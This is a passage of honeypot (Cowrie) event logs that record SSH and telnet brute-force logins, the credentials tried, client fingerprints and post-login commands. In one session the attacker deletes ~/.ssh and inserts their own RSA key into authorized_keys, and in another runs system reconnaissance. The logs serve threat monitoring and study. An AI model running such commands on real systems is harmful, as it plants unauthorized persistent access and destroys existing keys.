\\x81\\x9a\\xe1\\xb60E\\xa8\\xa9Nn\\x150P\\xa4Y$\\x8fgJ\\xdf\\xd5+\\x1cpc\\x85\\x18z\\xfd\\x13\\x8a=\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":2,"message":"discarded direct-tcp forward request 2 to 142.250.203.132:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xc5\\xcc\\xcen\\xf4\\x12@!\\x05E\\xba|Y\\x8e\\xd1\\xe2\\xd43?\\x97\\xf2\\xf2\\x9f\\xecs\\xffm\\xbf\\x82\\xe5\\x9c\\x94 \\xce\\x11\\t4M\\xd9\\xaad\\xffD\\x0ct@\\xa6I\\xb2g\\xab\\n*2E\\xac!\\xd1\\x9d\\xbc\\x92\\x90v\\xc8\\x16\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x81\\x9a\\xe1\\xb60E\\xa8\\xa9Nn\\x150P\\xa4Y$\\x8fgJ\\xdf\\xd5+\\x1cpc\\x85\\x18z\\xfd\\x13\\x8a=\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T06:15:56.678490Z","src_ip":"194.0.234.21","session":"1ecdcc5afead"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:15:56.725218Z","src_ip":"194.0.234.21","session":"1ecdcc5afead"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:15:57.117628Z","src_ip":"212.227.235.229","session":"106de91db15e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50811,"dst_ip":"1.2.3.4","dst_port":22,"session":"97eb76791a7e","protocol":"ssh","message":"New connection: 212.227.235.229:50811 (1.2.3.4:22) [session: 97eb76791a7e]","sensor":"my-vps","timestamp":"2025-08-31T06:15:57.243077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:15:57.245007Z","src_ip":"212.227.235.229","session":"97eb76791a7e"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:15:57.394191Z","src_ip":"212.227.235.229","session":"a9f1ea6d057a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:15:57.395344Z","src_ip":"212.227.235.229","session":"106de91db15e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:15:57.464713Z","src_ip":"212.227.235.229","session":"97eb76791a7e"}
{"eventid":"cowrie.login.success","username":"root","password":"Root#123456","message":"login attempt [root/Root#123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:15:58.335847Z","src_ip":"212.227.235.229","session":"97eb76791a7e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:15:59.227552Z","src_ip":"212.227.235.229","session":"97eb76791a7e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:15:59.228363Z","src_ip":"212.227.235.229","session":"97eb76791a7e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:15:59.229635Z","src_ip":"212.227.235.229","session":"97eb76791a7e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:15:59.449515Z","src_ip":"212.227.235.229","session":"97eb76791a7e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:15:59.908435Z","src_ip":"212.227.235.229","session":"97eb76791a7e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:15:59.909259Z","src_ip":"212.227.235.229","session":"97eb76791a7e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:16:00.131013Z","src_ip":"212.227.235.229","session":"97eb76791a7e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:16:00.131961Z","src_ip":"212.227.235.229","session":"97eb76791a7e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45771,"dst_ip":"1.2.3.4","dst_port":22,"session":"002ed51bf610","protocol":"ssh","message":"New connection: 212.227.235.229:45771 (1.2.3.4:22) [session: 002ed51bf610]","sensor":"my-vps","timestamp":"2025-08-31T06:16:00.362299Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:16:00.364947Z","src_ip":"212.227.235.229","session":"002ed51bf610"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:16:00.595242Z","src_ip":"212.227.235.229","session":"002ed51bf610"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:16:01.521770Z","src_ip":"212.227.235.229","session":"002ed51bf610"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:16:02.758375Z","src_ip":"212.227.235.229","session":"002ed51bf610"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54951,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c2ea6d7507d","protocol":"ssh","message":"New connection: 212.227.235.229:54951 (1.2.3.4:22) [session: 3c2ea6d7507d]","sensor":"my-vps","timestamp":"2025-08-31T06:16:02.968483Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:16:02.973207Z","src_ip":"212.227.235.229","session":"3c2ea6d7507d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:16:03.182238Z","src_ip":"212.227.235.229","session":"3c2ea6d7507d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:16:04.023705Z","src_ip":"212.227.235.229","session":"3c2ea6d7507d"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:16:04.236646Z","src_ip":"212.227.235.229","session":"97eb76791a7e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:16:04.237668Z","src_ip":"212.227.235.229","session":"3c2ea6d7507d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40868,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c22e1e70151","protocol":"ssh","message":"New connection: 212.227.125.160:40868 (1.2.3.4:22) [session: 1c22e1e70151]","sensor":"my-vps","timestamp":"2025-08-31T06:16:09.056025Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:16:09.556229Z","src_ip":"212.227.125.160","session":"1c22e1e70151"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:16:09.577962Z","src_ip":"212.227.125.160","session":"1c22e1e70151"}
{"eventid":"cowrie.session.closed","duration":"34.4","message":"Connection lost after 34.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:16:10.679092Z","src_ip":"212.227.235.229","session":"7c0ccfd957c5"}
{"eventid":"cowrie.login.failed","username":"test4","password":"root123","message":"login attempt [test4/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:16:11.958057Z","src_ip":"212.227.125.160","session":"1c22e1e70151"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:16:13.371115Z","src_ip":"212.227.125.160","session":"1c22e1e70151"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41382,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f67d8140e84","protocol":"ssh","message":"New connection: 212.227.235.229:41382 (1.2.3.4:22) [session: 6f67d8140e84]","sensor":"my-vps","timestamp":"2025-08-31T06:16:14.718085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:16:14.719176Z","src_ip":"212.227.235.229","session":"6f67d8140e84"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:16:14.979154Z","src_ip":"212.227.235.229","session":"6f67d8140e84"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql_123","message":"login attempt [mysql/mysql_123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:16:16.054261Z","src_ip":"212.227.235.229","session":"6f67d8140e84"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@123","message":"login attempt [root/Admin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:16:17.110919Z","src_ip":"212.227.235.229","session":"592f662fb3d3"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:16:17.314651Z","src_ip":"212.227.235.229","session":"6f67d8140e84"}
{"eventid":"cowrie.session.connect","src_ip":"3.130.96.91","src_port":36252,"dst_ip":"1.2.3.4","dst_port":23,"session":"befeff27b07a","protocol":"telnet","message":"New connection: 3.130.96.91:36252 (1.2.3.4:23) [session: befeff27b07a]","sensor":"my-vps","timestamp":"2025-08-31T06:16:22.569657Z"}
{"eventid":"cowrie.session.closed","duration":0.14487552642822266,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:16:22.714455Z","src_ip":"3.130.96.91","session":"befeff27b07a"}
{"eventid":"cowrie.session.connect","src_ip":"3.130.96.91","src_port":36262,"dst_ip":"1.2.3.4","dst_port":23,"session":"bbab18b298c9","protocol":"telnet","message":"New connection: 3.130.96.91:36262 (1.2.3.4:23) [session: bbab18b298c9]","sensor":"my-vps","timestamp":"2025-08-31T06:16:23.723932Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET / HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-31T06:16:23.724883Z","src_ip":"3.130.96.91","session":"bbab18b298c9"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-31T06:16:23.726144Z","src_ip":"3.130.96.91","session":"bbab18b298c9"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-31T06:16:23.727309Z","src_ip":"3.130.96.91","session":"bbab18b298c9"}
{"eventid":"cowrie.session.closed","duration":0.14238643646240234,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:16:23.865633Z","src_ip":"3.130.96.91","session":"bbab18b298c9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:16:26.911973Z","src_ip":"212.227.235.229","session":"592f662fb3d3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:16:26.912651Z","src_ip":"212.227.235.229","session":"592f662fb3d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35948,"dst_ip":"1.2.3.4","dst_port":22,"session":"43ffaf0402a5","protocol":"ssh","message":"New connection: 212.227.235.229:35948 (1.2.3.4:22) [session: 43ffaf0402a5]","sensor":"my-vps","timestamp":"2025-08-31T06:16:32.075516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-31T06:16:32.076681Z","src_ip":"212.227.235.229","session":"43ffaf0402a5"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellm